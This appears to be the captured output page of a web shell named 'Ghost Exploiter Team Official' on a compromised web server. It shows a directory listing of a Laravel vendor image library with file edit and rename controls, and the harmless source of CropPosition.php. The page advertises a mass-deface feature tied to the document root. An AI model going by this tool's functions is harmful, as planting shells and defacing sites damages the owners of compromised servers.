Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
spatie
/
image
/
src
/
Enums
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
AlignPosition.php
1.165KB
edt
ren
BorderType.php
0.148KB
edt
ren
ColorFormat.php
0.185KB
edt
ren
Constraint.php
0.149KB
edt
ren
CropPosition.php
0.793KB
edt
ren
Fit.php
1.014KB
edt
ren
FlipDirection.php
0.157KB
edt
ren
ImageDriver.php
0.138KB
edt
ren
Orientation.php
0.263KB
edt
ren
Unit.php
0.113KB
edt
ren
<?php namespace Spatie\Image\Enums; enum CropPosition: string { case TopLeft = 'topLeft'; case Top = 'top'; case TopRight = 'topRight'; case Left = 'left'; case Center = 'center'; case Right = 'right'; case BottomLeft = 'bottomLeft'; case Bottom = 'bottom'; case BottomRight = 'bottomRight'; /** @return array<int> */ public function offsetPercentages(): array { return match ($this) { self::TopLeft => [0, 0], self::Top => [50, 0], self::TopRight => [100, 0], self::Left => [0, 50], self::Center => [50, 50], self::Right => [100, 50], self::BottomLeft => [0, 100], self::Bottom => [50, 100], self::BottomRight => [100, 100], }; } }
<=Back
Liking